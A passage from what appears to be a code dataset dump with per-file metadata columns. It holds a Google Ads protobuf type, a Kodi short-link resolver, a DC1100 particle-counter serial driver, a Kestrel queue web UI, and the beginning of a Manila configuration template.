| apache-2.0 | 6,204,695,707,061,553,000 | 40.960784 | 116 | 0.662617 | false | 3.092486 | false | false | false |
googleapis/googleapis-gen | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/ad_schedule_view.py | 1 | 1328 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v7.resources',
marshal='google.ads.googleads.v7',
manifest={
'AdScheduleView',
},
)
class AdScheduleView(proto.Message):
r"""An ad schedule view summarizes the performance of campaigns
by AdSchedule criteria.
Attributes:
resource_name (str):
Output only. The resource name of the ad schedule view.
AdSchedule view resource names have the form:
``customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}``
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 372,957,407,092,470,800 | 27.869565 | 84 | 0.683735 | false | 4 | false | false | false |
Seko34/Kodi-Development | script.module.core.ultrastream/resources/lib/unshortenurl.py | 1 | 6570 | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------
'''
Created on 02 Jan 2016
@author: Seko
@summary: Class for unshorten link
'''
#---------------------------------------------------------------------
# ____________________ I M P O R T ____________________
import re
import urllib
import urllib2
import copy
import traceback
import cookielib
import time
import json
import xbmcgui
import constant
import webUtil
from urlparse import urlsplit
# ____________________ C L A S S ____________________
class UnshortenUrl(object):
PATTERN_VIIDME = r'viid\.me'
PATTERN_CLLKME = r'cllkme\.com'
PATTERN_SHST = r'sh\.st'
PATTERN_SHST_WITH_FREEZE = r'http://sh.st/freeze/'
PATTERN_DPSTREAM = r'https://www.dpstream.net/external_link/'
def __init__(self):
"""
Constructor
"""
self.HEADER_CFG = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
self.cookiejar = cookielib.CookieJar()
self.urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar),webUtil.SmartRedirectHandler())
def unshortUrl(self,url):
"""
Method to unshort url
@param url: the url to unshort
@return the final url
"""
newUrl = self._unshort(url)
while url != newUrl:
url = newUrl
newUrl = self._unshort(url)
return newUrl
def _unshort(self,url):
"""
Method to unshort url
@param url: the url to unshort
@return the final url
"""
domain = urlsplit(url).netloc
if not domain:
return url
if re.search(self.PATTERN_VIIDME,url):
return self._unshortshst(url,'viid.me')
if re.search(self.PATTERN_CLLKME,url):
return self._unshortshst(url,'cllkme.com')
elif re.search(self.PATTERN_SHST_WITH_FREEZE,url):
return self._unshortshst(url[20:])
elif re.search(self.PATTERN_SHST,url):
return self._unshortshst(url)
elif re.search(self.PATTERN_DPSTREAM,url):
return self._unshortdpstream(url)
else:
return url
def _unshortshst(self,url,host='sh.st'):
"""
Method to unshort Viid.me url
@param url: the url to unshort
@return the final url
"""
if url.endswith('/'):
url = url[:-1]
request = urllib2.Request(url, headers=self.HEADER_CFG)
response = None
try:
response = self.urlOpener.open(request)
if response is not None and response.getcode() == 200:
content = response.read()
sessionPattern = re.compile('(.*)(sessionId: ")(.{1,50})(",)(.*)',re.DOTALL)
match = sessionPattern.match(content)
if match is not None:
# __ Get adSessionId
adSessionId = match.group(3)
# __ Construct url
urlEnd = 'http://'+host+'/shortest-url/end-adsession?'
data1 = {'adSessionId':adSessionId,'callback':'c'}
dataStr = urllib.urlencode(data1)
urlEnd+=dataStr
# ___ Define headers
headers1 = copy.copy(self.HEADER_CFG)
headers1["Host"] = host
headers1["Referer"] = url
# ___ Sleep 5 seconds
currentSecond = 5
dp = xbmcgui.DialogProgress()
dp.create(constant.__addon__.getLocalizedString(33057),str(currentSecond)+' secondes')
while currentSecond > 0:
currentSecond = currentSecond-1
dp.update((5-currentSecond)*20, str(currentSecond)+' secondes')
time.sleep(1)
dp.close()
dp = None
# ___ Request the final url
requestEnd = urllib2.Request(urlEnd,headers=headers1)
responseEnd = None
try:
responseEnd = self.urlOpener.open(requestEnd)
except urllib2.HTTPError as e:
responseEnd = e
except:
traceback.print_exc()
if responseEnd is not None and responseEnd.getcode() == 200:
# ___ Get the destination url
contentEnd = responseEnd.read()
jsonResult = json.loads(contentEnd[6:-2].decode('utf-8'))
return jsonResult['destinationUrl']
except:
traceback.print_exc()
return url
def _unshortdpstream(self,url):
"""
Method to unshort dpstream url
"""
if url.endswith('/'):
url = url[:-1]
print url
request = urllib2.Request(url, headers=self.HEADER_CFG)
response = None
try:
response = self.urlOpener.open(request)
if response is not None and response.getcode() == 200:
content = response.read()
index = content.find('window.open')
if index > 0:
getUrlPattern = re.compile("(.*)(window.open\(\\\\')(.*)(\\\\',\\\\'_blank\\\\')(.*)",re.MULTILINE)
match = getUrlPattern.match(content[index:])
if match is not None:
return match.group(3)
else:
print content
except:
traceback.print_exc()
return url | gpl-3.0 | -4,804,087,580,398,559,000 | 36.887574 | 154 | 0.4586 | false | 4.503084 | false | false | false |
JohnDMcMaster/uvscada | uvscada/dc1100.py | 1 | 4669 | '''
uvscada
Copyright 2012 John McMaster <[email protected]>
Licensed under the terms of the LGPL V3 or later, see COPYING for details
'''
'''
I suspect all DC1100 units have the PC interface internally and just aren't brought outside
Not sure how hard that is to do yourself though
Also the manual hints that there is no internal difference between the pro and regular units
The only difference is the calibration
'''
import serial
#import uvscada.serial
import re
'''
Small particles are displayed on the left
Large particles are didplayed on the right
Regular
Small: Detection limit of 1 micron (um)
Large: ~5 um
Pro
Small: 0.5 um
Large: 2.5 um
Values are scaled to represent concentration of particles in 0.01 cubic foot of sampled air
Since this object only reports density it doesn't matter what these actual size values are
'''
class Measurement:
# Qualities
VERY_POOR = 1
POOR = 2
FAIR = 3
GOOD = 4
VERY_GOOD = 5
EXCELLENT = 6
@staticmethod
def quality_str(q):
vals = ['VERY_POOR', 'POOR','FAIR','GOOD','VERY_GOOD','EXCELLENT']
for v in vals:
if q == eval('Measurement.' + v):
return v
return None
def __init__(self, small, large):
self.small = small
self.large = large
def small_cpf(self):
return self.small * self.cpf_conversion()
def large_cpf(self):
return self.large * self.cpf_conversion()
def cpf_conversion(self):
# Convert particles / (0.01 ft**3) to particles / ft**3
# (as used in FED-STD-209E)
return 1 / 0.01
def small_cpm(self):
return self.small * self.cpm_conversion()
def large_cpm(self):
return self.large * self.cpm_conversion()
def cpm_conversion(self):
# Convert particles / (0.01 ft**3) to particles / m**3
# 3531.466672149
return 1 / (0.01 * ((12.0 * 25.4 / 1000.0)**3))
def valid(self):
# Some arbitrary high limits to detect a bad data parse
if self.small > 100000 or self.small < 0:
return False
if self.large > 100000 or self.large < 0:
return False
# I'm not sure if this is actually true
return self.small > self.large
@staticmethod
def parse(s):
# Reading should be
# 1231,422
parsed = re.match('([0-9]+)[,]([0-9]+)', s)
if not parsed:
return None
return Measurement(int(parsed.group(1)), int(parsed.group(2)))
class DC1100:
def __init__(self, device):
#if device is None:
# device = uvscada.serial.get_device()
self.device = device
self.serial = serial.Serial(self.device, 9600, timeout=1)
self.last_meas = None
# Start out
# spike
# and then drop back
self.test_meas = []
#self.test_meas = [(100, 10), (100, 10), (100, 10), (100, 10), (1000, 100), (1000, 100), (1000, 100), (100, 10), (100, 10), (100, 10), (100, 10), (100, 10)]
# Don't return until a measurement is availible
def wait_meas(self, require_valid = False):
if len(self.test_meas) > 0:
m = Measurement(*self.test_meas[0])
self.test_meas = self.test_meas[1:]
self.last_meas = m
return m
while True:
m = self.meas()
if m and ((not require_valid) or m.valid()):
return m
# One Measurement per minute
def meas(self):
# Read until newline
s = ''
while True:
c = self.serial.read()
if c == '\n':
break
s += c
self.last_meas = Measurement.parse(s)
return self.last_meas
def quality(self):
'''
manual page 12 definition
Although manual does not say these are small particle counts the back of the unit does
'''
if self.last_meas == None:
return None
return self.meas_quality(self.last_meas)
def quality_str(self):
return Measurement.quality_str(self.quality())
def meas_quality(self, meas):
'''
manual page 12 definition
Although manual does not say these are small particle counts the back of the unit does
'''
small = meas.small
if small >= 1000:
return Measurement.VERY_POOR
elif small >= 350:
return Measurement.POOR
elif small >= 100:
return Measurement.FAIR
elif small >= 50:
return Measurement.GOOD
elif small >= 25:
return Measurement.VERY_GOOD
elif small >= 0:
return Measurement.EXCELLENT
else:
raise Exception('Malformed measurement')
class DC1100Pro(DC1100):
def __init__(self, dev):
DC1100.__init__(self, dev)
def meas_quality(self, meas):
small = meas.small
if small >= 3000:
return Measurement.VERY_POOR
elif small >= 1050:
return Measurement.POOR
elif small >= 300:
return Measurement.FAIR
elif small >= 150:
return Measurement.GOOD
# 100 would be barely passing class 10k cleanroom
elif small >= 75:
return Measurement.VERY_GOOD
elif small >= 0:
return Measurement.EXCELLENT
else:
raise Exception('Malformed measurement')
| bsd-2-clause | -6,698,238,722,773,940,000 | 23.703704 | 158 | 0.674877 | false | 3.0181 | true | false | false |
matterkkila/kestrelweb | kestrelweb/main.py | 1 | 4019 |
import logging.config
import local_settings; logging.config.fileConfig(local_settings.logging_config)
import dream
import kestrel_actions
import util
App = dream.App()
@App.expose('/')
def home(request):
return dream.Response(body=util.template('index.html'), content_type='text/html')
@App.expose('/ajax/action.json')
def ajax_action(request):
callback = request.params['callback'] if 'callback' in request.params else None
action = request.params['action'] if 'action' in request.params else None
server_queue = request.params.getall('server') if 'server' in request.params else []
data = {}
status = 200
if len(server_queue) == 0:
data['error'] = 'Missing server or queue name'
status = 500
elif action in ['flush', 'delete', 'peek', 'flush_all', 'reload', 'shutdown']:
actions = []
for _sq in server_queue:
(server, queue) = _sq.split(',', 1) if _sq.count(',') else (_sq, None)
if action in ['flush', 'delete', 'peek']:
actions.append((server, [queue]))
else:
actions.append((server, []))
data['results'] = kestrel_actions.action(action, actions)
else:
data['error'] = 'Invalid action'
status = 500
return dream.JSONResponse(callback=callback, body=data, status=status)
@App.expose('/ajax/stats.json')
def ajax_stats(request):
callback = request.params['callback'] if 'callback' in request.params else None
servers = request.params['servers'] if 'servers' in request.params else None
qsort = request.params['qsort'] if 'qsort' in request.params else None
qreverse = int(request.params['qreverse']) if 'qreverse' in request.params else 0
qfilter = request.params['qfilter'] if 'qfilter' in request.params else None
response = {}
if servers:
server_stats = dict([(server, None) for server in servers.split(',')])
queue_stats = []
stats_response = kestrel_actions.stats(server_stats.iterkeys())
if stats_response is not None:
for server, _data in stats_response.iteritems():
server_stats[server] = _data['server']
queue_stats.extend([
dict(server=server, queue=queue, **qstats)
for queue, qstats in _data['queues'].iteritems()
if util.queue_filter(qfilter, queue, qstats)
])
response['servers'] = [
{'server': server, 'stats': _stats}
for server, _stats in server_stats.iteritems()
]
response['servers'].sort(key=util.QUEUE_SORT['server'])
response['queues'] = queue_stats
response['queues'].sort(key=util.QUEUE_SORT['server'])
response['queues'].sort(key=util.QUEUE_SORT[qsort] if qsort in util.QUEUE_SORT else util.QUEUE_SORT['name'], reverse=qreverse)
return dream.JSONResponse(callback=callback, body=response)
@App.expose('/ajax/config.json')
def templates(request):
callback = request.params['callback'] if 'callback' in request.params else None
return dream.JSONResponse(callback=callback, body={
'servers': [{'server': server} for server in local_settings.servers],
'templates': {
'content': util.template('content.html'),
'servers': util.template('servers.html'),
'queues': util.template('queues.html'),
}
})
@App.expose('/static/<filepath:.*>')
def static(request, filepath):
body = ''
content_type = 'test/plain'
try:
body = util.static(filepath)
if filepath.endswith('.css'):
content_type = 'text/css'
elif filepath.endswith('.js'):
content_type = 'text/javascript'
elif filepath.endswith('.html'):
content_type = 'text/html'
elif filepath.endswith('.png'):
content_type = 'image/png'
except:
pass
return dream.Response(body=body, content_type=content_type) | mit | -1,459,676,298,214,296,800 | 34.263158 | 134 | 0.611346 | false | 3.940196 | false | false | false |
nofdev/playback | playback/templates/manila_conf.py | 2 | 27513 | conf_manila_conf = """[DEFAULT]
default_share_type = default_share_type
rootwrap_config = /etc/manila/rootwrap.conf
auth_strategy = keystone
my_ip = {{ my_ip }}
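# The placeholder values above are filled in when this template is
# rendered by playback. A plausible rendered value (assumed deployment,
# for illustration only):
#   my_ip = 10.0.0.41
# default_share_type is assumed to name a share type that already
# exists, e.g. one created beforehand with:
#   manila type-create default_share_type True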
#
# From oslo.messaging
#
# Size of RPC connection pool. (integer value)
# Deprecated group/name - [DEFAULT]/rpc_conn_pool_size
#rpc_conn_pool_size = 30
# ZeroMQ bind address. Should be a wildcard (*), an ethernet
# interface, or an IP address. The "host" option should point or
# resolve to this address. (string value)
#rpc_zmq_bind_address = *
# MatchMaker driver. (string value)
# Allowed values: redis, dummy
#rpc_zmq_matchmaker = redis
# Type of concurrency used. Either "native" or "eventlet" (string
# value)
#rpc_zmq_concurrency = eventlet
# Number of ZeroMQ contexts, defaults to 1. (integer value)
#rpc_zmq_contexts = 1
# Maximum number of ingress messages to locally buffer per topic.
# Default is unlimited. (integer value)
#rpc_zmq_topic_backlog = <None>
# Directory for holding IPC sockets. (string value)
#rpc_zmq_ipc_dir = /var/run/openstack
# Name of this node. Must be a valid hostname, FQDN, or IP address.
# Must match "host" option, if running Nova. (string value)
#rpc_zmq_host = localhost
# Seconds to wait before a cast expires (TTL). The default value of -1
# specifies an infinite linger period. The value of 0 specifies no
# linger period. Pending messages shall be discarded immediately when
# the socket is closed. Only supported by impl_zmq. (integer value)
#rpc_cast_timeout = -1
# The default number of seconds that poll should wait. Poll raises a
# timeout exception when the timeout expires. (integer value)
#rpc_poll_timeout = 1
# Expiration timeout in seconds of a name service record about an
# existing target (< 0 means no timeout). (integer value)
#zmq_target_expire = 120
# Use the PUB/SUB pattern for fanout methods. PUB/SUB always uses a
# proxy. (boolean value)
#use_pub_sub = true
# Minimal port number for random ports range. (port value)
# Minimum value: 0
# Maximum value: 65535
#rpc_zmq_min_port = 49152
# Maximal port number for random ports range. (integer value)
# Minimum value: 1
# Maximum value: 65536
#rpc_zmq_max_port = 65536
# Number of retries to find a free port number before failing with
# ZMQBindError. (integer value)
#rpc_zmq_bind_port_retries = 100
# Size of executor thread pool. (integer value)
# Deprecated group/name - [DEFAULT]/rpc_thread_pool_size
#executor_thread_pool_size = 64
# Seconds to wait for a response from a call. (integer value)
#rpc_response_timeout = 60
# A URL representing the messaging driver to use and its full
# configuration. If not set, we fall back to the rpc_backend option
# and driver specific configuration. (string value)
#transport_url = <None>
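# A minimal example of the transport URL format, with assumed
# credentials and host (not part of the original template):
#   transport_url = rabbit://openstack:RABBIT_PASS@controller:5672/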
# The messaging driver to use, defaults to rabbit. Other drivers
# include amqp and zmq. (string value)
rpc_backend = rabbit
# The default exchange under which topics are scoped. May be
# overridden by an exchange name specified in the transport_url
# option. (string value)
#control_exchange = openstack
[cors]
#
# From oslo.middleware.cors
#
# Indicate whether this resource may be shared with the domain
# received in the request's "origin" header. (list value)
#allowed_origin = <None>
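# Example, assuming the dashboard is the only allowed origin
# (hypothetical host):
#   allowed_origin = https://horizon.example.com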
# Indicate that the actual request can include user credentials
# (boolean value)
#allow_credentials = true
# Indicate which headers are safe to expose to the API. Defaults to
# HTTP Simple Headers. (list value)
#expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
# Maximum cache age of CORS preflight requests. (integer value)
#max_age = 3600
# Indicate which methods can be used during the actual request. (list
# value)
#allow_methods = GET,POST,PUT,DELETE,OPTIONS
# Indicate which header field names may be used during the actual
# request. (list value)
#allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
[cors.subdomain]
#
# From oslo.middleware.cors
#
# Indicate whether this resource may be shared with the domain
# received in the request's "origin" header. (list value)
#allowed_origin = <None>
# Indicate that the actual request can include user credentials
# (boolean value)
#allow_credentials = true
# Indicate which headers are safe to expose to the API. Defaults to
# HTTP Simple Headers. (list value)
#expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
# Maximum cache age of CORS preflight requests. (integer value)
#max_age = 3600
# Indicate which methods can be used during the actual request. (list
# value)
#allow_methods = GET,POST,PUT,DELETE,OPTIONS
# Indicate which header field names may be used during the actual
# request. (list value)
#allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma
[database]
#
# From oslo.db
#
# The file name to use with SQLite. (string value)
# Deprecated group/name - [DEFAULT]/sqlite_db
#sqlite_db = oslo.sqlite
# If True, SQLite uses synchronous mode. (boolean value)
# Deprecated group/name - [DEFAULT]/sqlite_synchronous
#sqlite_synchronous = true
# The back end to use for the database. (string value)
# Deprecated group/name - [DEFAULT]/db_backend
#backend = sqlalchemy
# The SQLAlchemy connection string to use to connect to the database.
# (string value)
# Deprecated group/name - [DEFAULT]/sql_connection
# Deprecated group/name - [DATABASE]/sql_connection
# Deprecated group/name - [sql]/connection
connection = {{ connection }}
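# When rendered, the connection string is expected to follow the usual
# SQLAlchemy URL form, e.g. (assumed database user/password/host):
#   connection = mysql+pymysql://manila:MANILA_DBPASS@controller/manila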
# The SQLAlchemy connection string to use to connect to the slave
# database. (string value)
#slave_connection = <None>
# The SQL mode to be used for MySQL sessions. This option, including
# the default, overrides any server-set SQL mode. To use whatever SQL
# mode is set by the server configuration, set this to no value.
# Example: mysql_sql_mode= (string value)
#mysql_sql_mode = TRADITIONAL
# Timeout before idle SQL connections are reaped. (integer value)
# Deprecated group/name - [DEFAULT]/sql_idle_timeout
# Deprecated group/name - [DATABASE]/sql_idle_timeout
# Deprecated group/name - [sql]/idle_timeout
#idle_timeout = 3600
# Minimum number of SQL connections to keep open in a pool. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_min_pool_size
# Deprecated group/name - [DATABASE]/sql_min_pool_size
#min_pool_size = 1
# Maximum number of SQL connections to keep open in a pool. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_max_pool_size
# Deprecated group/name - [DATABASE]/sql_max_pool_size
#max_pool_size = <None>
# Maximum number of database connection retries during startup. Set to
# -1 to specify an infinite retry count. (integer value)
# Deprecated group/name - [DEFAULT]/sql_max_retries
# Deprecated group/name - [DATABASE]/sql_max_retries
#max_retries = 10
# Interval between retries of opening a SQL connection. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_retry_interval
# Deprecated group/name - [DATABASE]/reconnect_interval
#retry_interval = 10
# If set, use this value for max_overflow with SQLAlchemy. (integer
# value)
# Deprecated group/name - [DEFAULT]/sql_max_overflow
# Deprecated group/name - [DATABASE]/sqlalchemy_max_overflow
#max_overflow = 50
# Verbosity of SQL debugging information: 0=None, 100=Everything.
# (integer value)
# Deprecated group/name - [DEFAULT]/sql_connection_debug
#connection_debug = 0
# Add Python stack traces to SQL as comment strings. (boolean value)
# Deprecated group/name - [DEFAULT]/sql_connection_trace
#connection_trace = false
# If set, use this value for pool_timeout with SQLAlchemy. (integer
# value)
# Deprecated group/name - [DATABASE]/sqlalchemy_pool_timeout
#pool_timeout = <None>
# Enable the experimental use of database reconnect on connection
# lost. (boolean value)
#use_db_reconnect = false
# Seconds between retries of a database transaction. (integer value)
#db_retry_interval = 1
# If True, increases the interval between retries of a database
# operation up to db_max_retry_interval. (boolean value)
#db_inc_retry_interval = true
# If db_inc_retry_interval is set, the maximum seconds between retries
# of a database operation. (integer value)
#db_max_retry_interval = 10
# Maximum retries in case of connection error or deadlock error before
# error is raised. Set to -1 to specify an infinite retry count.
# (integer value)
#db_max_retries = 20
#
# From oslo.db.concurrency
#
# Enable the experimental use of thread pooling for all DB API calls
# (boolean value)
# Deprecated group/name - [DEFAULT]/dbapi_use_tpool
#use_tpool = false
[keystone_authtoken]
#
# From keystonemiddleware.auth_token
#
# Complete public Identity API endpoint. (string value)
auth_uri = {{ auth_uri }}
auth_url = {{ auth_url }}
# API version of the admin Identity API endpoint. (string value)
#auth_version = <None>
# Do not handle authorization requests within the middleware, but
# delegate the authorization decision to downstream WSGI components.
# (boolean value)
#delay_auth_decision = false
# Request timeout value for communicating with Identity API server.
# (integer value)
#http_connect_timeout = <None>
# How many times are we trying to reconnect when communicating with
# Identity API Server. (integer value)
#http_request_max_retries = 3
# Env key for the swift cache. (string value)
#cache = <None>
# Required if identity server requires client certificate (string
# value)
#certfile = <None>
# Required if identity server requires client certificate (string
# value)
#keyfile = <None>
# A PEM encoded Certificate Authority to use when verifying HTTPs
# connections. Defaults to system CAs. (string value)
#cafile = <None>
# Verify HTTPS connections. (boolean value)
#insecure = false
# The region in which the identity server can be found. (string value)
#region_name = <None>
# Directory used to cache files related to PKI tokens. (string value)
#signing_dir = <None>
# Optionally specify a list of memcached server(s) to use for caching.
# If left undefined, tokens will instead be cached in-process. (list
# value)
# Deprecated group/name - [DEFAULT]/memcache_servers
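# Example (illustrative): memcached_servers = controller:11211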
memcached_servers = {{ memcached_servers }}
# In order to prevent excessive effort spent validating tokens, the
# middleware caches previously-seen tokens for a configurable duration
# (in seconds). Set to -1 to disable caching completely. (integer
# value)
#token_cache_time = 300
# Determines the frequency at which the list of revoked tokens is
# retrieved from the Identity service (in seconds). A high number of
# revocation events combined with a low cache duration may
# significantly reduce performance. (integer value)
#revocation_cache_time = 10
# (Optional) If defined, indicate whether token data should be
# authenticated or authenticated and encrypted. If MAC, token data is
# authenticated (with HMAC) in the cache. If ENCRYPT, token data is
# encrypted and authenticated in the cache. If the value is not one of
# these options or empty, auth_token will raise an exception on
# initialization. (string value)
# Allowed values: None, MAC, ENCRYPT
#memcache_security_strategy = None
# (Optional, mandatory if memcache_security_strategy is defined) This
# string is used for key derivation. (string value)
#memcache_secret_key = <None>
# (Optional) Number of seconds memcached server is considered dead
# before it is tried again. (integer value)
#memcache_pool_dead_retry = 300
# (Optional) Maximum total number of open connections to every
# memcached server. (integer value)
#memcache_pool_maxsize = 10
# (Optional) Socket timeout in seconds for communicating with a
# memcached server. (integer value)
#memcache_pool_socket_timeout = 3
# (Optional) Number of seconds a connection to memcached is held
# unused in the pool before it is closed. (integer value)
#memcache_pool_unused_timeout = 60
# (Optional) Number of seconds that an operation will wait to get a
# memcached client connection from the pool. (integer value)
#memcache_pool_conn_get_timeout = 10
# (Optional) Use the advanced (eventlet safe) memcached client pool.
# The advanced pool will only work under python 2.x. (boolean value)
#memcache_use_advanced_pool = false
# (Optional) Indicate whether to set the X-Service-Catalog header. If
# False, middleware will not ask for service catalog on token
# validation and will not set the X-Service-Catalog header. (boolean
# value)
#include_service_catalog = true
# Used to control the use and type of token binding. Can be set to:
# "disabled" to not check token binding. "permissive" (default) to
# validate binding information if the bind type is of a form known to
# the server and ignore it if not. "strict" like "permissive" but if
# the bind type is unknown the token will be rejected. "required" any
# form of token binding is needed to be allowed. Finally the name of a
# binding method that must be present in tokens. (string value)
#enforce_token_bind = permissive
# If true, the revocation list will be checked for cached tokens. This
# requires that PKI tokens are configured on the identity server.
# (boolean value)
#check_revocations_for_cached = false
# Hash algorithms to use for hashing PKI tokens. This may be a single
# algorithm or multiple. The algorithms are those supported by Python
# standard hashlib.new(). The hashes will be tried in the order given,
# so put the preferred one first for performance. The result of the
# first hash will be stored in the cache. This will typically be set
# to multiple values only while migrating from a less secure algorithm
# to a more secure one. Once all the old tokens are expired this
# option should be set to a single value for better performance. (list
# value)
#hash_algorithms = md5
# Prefix to prepend at the beginning of the path. Deprecated, use
# identity_uri. (string value)
#auth_admin_prefix =
# Host providing the admin Identity API endpoint. Deprecated, use
# identity_uri. (string value)
#auth_host = 127.0.0.1
# Port of the admin Identity API endpoint. Deprecated, use
# identity_uri. (integer value)
#auth_port = 35357
# Protocol of the admin Identity API endpoint. Deprecated, use
# identity_uri. (string value)
# Allowed values: http, https
#auth_protocol = https
# Complete admin Identity API endpoint. This should specify the
# unversioned root endpoint e.g. https://localhost:35357/ (string
# value)
#identity_uri = <None>
# This option is deprecated and may be removed in a future release.
# Single shared secret with the Keystone configuration used for
# bootstrapping a Keystone installation, or otherwise bypassing the
# normal authentication process. This option should not be used, use
# `admin_user` and `admin_password` instead. (string value)
#admin_token = <None>
# Service username. (string value)
#admin_user = <None>
# Service user password. (string value)
#admin_password = <None>
# Service tenant name. (string value)
#admin_tenant_name = admin
# Authentication type to load (unknown value)
# Deprecated group/name - [DEFAULT]/auth_plugin
auth_type = password
# Config Section from which to load plugin specific options (unknown
# value)
#auth_section = <None>
project_domain_name = default
user_domain_name = default
project_name = service
username = manila
password = {{ manila_pass }}
[matchmaker_redis]
#
# From oslo.messaging
#
# Host to locate redis. (string value)
#host = 127.0.0.1
# Use this port to connect to redis host. (port value)
# Minimum value: 0
# Maximum value: 65535
#port = 6379
# Password for Redis server (optional). (string value)
#password =
# List of Redis Sentinel hosts (fault tolerance mode) e.g.
# [host:port, host1:port ... ] (list value)
#sentinel_hosts =
# Redis replica set name. (string value)
#sentinel_group_name = oslo-messaging-zeromq
# Time in ms to wait between connection attempts. (integer value)
#wait_timeout = 500
# Time in ms to wait before the transaction is killed. (integer value)
#check_timeout = 20000
# Timeout in ms on blocking socket operations (integer value)
#socket_timeout = 1000
[oslo_messaging_amqp]
#
# From oslo.messaging
#
# address prefix used when sending to a specific server (string value)
# Deprecated group/name - [amqp1]/server_request_prefix
#server_request_prefix = exclusive
# address prefix used when broadcasting to all servers (string value)
# Deprecated group/name - [amqp1]/broadcast_prefix
#broadcast_prefix = broadcast
# address prefix when sending to any server in group (string value)
# Deprecated group/name - [amqp1]/group_request_prefix
#group_request_prefix = unicast
# Name for the AMQP container (string value)
# Deprecated group/name - [amqp1]/container_name
#container_name = <None>
# Timeout for inactive connections (in seconds) (integer value)
# Deprecated group/name - [amqp1]/idle_timeout
#idle_timeout = 0
# Debug: dump AMQP frames to stdout (boolean value)
# Deprecated group/name - [amqp1]/trace
#trace = false
# CA certificate PEM file to verify server certificate (string value)
# Deprecated group/name - [amqp1]/ssl_ca_file
#ssl_ca_file =
# Identifying certificate PEM file to present to clients (string
# value)
# Deprecated group/name - [amqp1]/ssl_cert_file
#ssl_cert_file =
# Private key PEM file used to sign cert_file certificate (string
# value)
# Deprecated group/name - [amqp1]/ssl_key_file
#ssl_key_file =
# Password for decrypting ssl_key_file (if encrypted) (string value)
# Deprecated group/name - [amqp1]/ssl_key_password
#ssl_key_password = <None>
# Accept clients using either SSL or plain TCP (boolean value)
# Deprecated group/name - [amqp1]/allow_insecure_clients
#allow_insecure_clients = false
# Space separated list of acceptable SASL mechanisms (string value)
# Deprecated group/name - [amqp1]/sasl_mechanisms
#sasl_mechanisms =
# Path to directory that contains the SASL configuration (string
# value)
# Deprecated group/name - [amqp1]/sasl_config_dir
#sasl_config_dir =
# Name of configuration file (without .conf suffix) (string value)
# Deprecated group/name - [amqp1]/sasl_config_name
#sasl_config_name =
# User name for message broker authentication (string value)
# Deprecated group/name - [amqp1]/username
#username =
# Password for message broker authentication (string value)
# Deprecated group/name - [amqp1]/password
#password =
[oslo_messaging_notifications]
#
# From oslo.messaging
#
# The driver(s) to handle sending notifications. Possible values are
# messaging, messagingv2, routing, log, test, noop (multi valued)
# Deprecated group/name - [DEFAULT]/notification_driver
#driver =
# A URL representing the messaging driver to use for notifications. If
# not set, we fall back to the same configuration used for RPC.
# (string value)
# Deprecated group/name - [DEFAULT]/notification_transport_url
#transport_url = <None>
# AMQP topic used for OpenStack notifications. (list value)
# Deprecated group/name - [rpc_notifier2]/topics
# Deprecated group/name - [DEFAULT]/notification_topics
#topics = notifications
[oslo_messaging_rabbit]
#
# From oslo.messaging
#
# Use durable queues in AMQP. (boolean value)
# Deprecated group/name - [DEFAULT]/amqp_durable_queues
# Deprecated group/name - [DEFAULT]/rabbit_durable_queues
#amqp_durable_queues = false
# Auto-delete queues in AMQP. (boolean value)
# Deprecated group/name - [DEFAULT]/amqp_auto_delete
#amqp_auto_delete = false
# SSL version to use (valid only if SSL enabled). Valid values are
# TLSv1 and SSLv23. SSLv2, SSLv3, TLSv1_1, and TLSv1_2 may be
# available on some distributions. (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_version
#kombu_ssl_version =
# SSL key file (valid only if SSL enabled). (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_keyfile
#kombu_ssl_keyfile =
# SSL cert file (valid only if SSL enabled). (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_certfile
#kombu_ssl_certfile =
# SSL certification authority file (valid only if SSL enabled).
# (string value)
# Deprecated group/name - [DEFAULT]/kombu_ssl_ca_certs
#kombu_ssl_ca_certs =
# How long to wait before reconnecting in response to an AMQP consumer
# cancel notification. (floating point value)
# Deprecated group/name - [DEFAULT]/kombu_reconnect_delay
#kombu_reconnect_delay = 1.0
# EXPERIMENTAL: Possible values are: gzip, bz2. If not set, compression
# will not be used. This option may not be available in future
# versions. (string value)
#kombu_compression = <None>
# How long to wait for a missing client before abandoning sending it
# its replies. This value should not be longer than rpc_response_timeout.
# (integer value)
# Deprecated group/name - [DEFAULT]/kombu_reconnect_timeout
#kombu_missing_consumer_retry_timeout = 60
# Determines how the next RabbitMQ node is chosen in case the one we
# are currently connected to becomes unavailable. Takes effect only if
# more than one RabbitMQ node is provided in config. (string value)
# Allowed values: round-robin, shuffle
#kombu_failover_strategy = round-robin
# The RabbitMQ broker address where a single node is used. (string
# value)
# Deprecated group/name - [DEFAULT]/rabbit_host
#rabbit_host = localhost
